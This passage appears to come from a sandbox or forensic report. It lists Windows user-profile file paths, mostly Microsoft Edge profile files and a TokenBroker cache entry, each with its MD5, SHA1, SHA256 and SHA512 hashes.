| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 1a416c84ec604373dbfd5e58d4eb0cdc |
| SHA1 | 9db2d1c121c1bac8f72c7746799eeaa1f60817ae |
| SHA256 | 28407ff150250031eb0650ca1c0504607e11b9b0fc56c759ae5dff1c47b1a071 |
| SHA512 | a14b5e679206cee9dd19d9d2ae19170f814b7ee0f2163028562ddcee8165c7dca36ea2b106da9e97fdec6c9a33d6e0c301b15af0a4f14f6912286ff79daad200 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 16ef691ee178b21b9613aa04b8e5814b |
| SHA1 | 8fe48215758049b96e722c7d89db3e810d4df86b |
| SHA256 | b8020561ea8a3b2726b09db5bb192dce5489e2ac0f9e5296d436f4fea25e7b5a |
| SHA512 | 27d904b7ac85be002721322fb36863662b2b64b2ee5491a021efac8f84d23ab28b37929bff45917fb82803a15e636eae77e9d4eac265f061545ca9dc2d441bce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | e6d8fd99fa90aff99a5c991c3d4c20be |
| SHA1 | be0e65ee36bb18709ae4204128ac2d0c3dbae475 |
| SHA256 | e9f13e8d7aeb72ee9100b86bbd9c95ef234962beedd5ae391e5f1480984225c3 |
| SHA512 | 6bfa026925b1c506d95c98fce3f573aa2f2fa08ea62439ee3e3cc9bfdaefa4d7f31172ada34158f5dcd70c1a54e4fd1d794ad030f7eda37f8da8ae839373048a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 40e2018187b61af5be8caf035fb72882 |
| SHA1 | 72a0b7bcb454b6b727bf90da35879b3e9a70621e |
| SHA256 | b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5 |
| SHA512 | a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnWebGPUCache\data_1
| MD5 | a5b3a7e7f7fc44d586d1883d62997e6d |
| SHA1 | d90622365014bbb90950bb2c7b99940d2d09bfec |
| SHA256 | 0a9fd1ccc8c526bd9196d0db29dd18237fb56d748ddb9c58a4d6d2b3957b4012 |
| SHA512 | 463f9842b62e8438549f55b8e0e2a4a1391e254d1e7c498d9af74d16e74752c797ec079313e55cdc70a41b3c8a820b7e42868959a93cb89448b6be10bab13029 |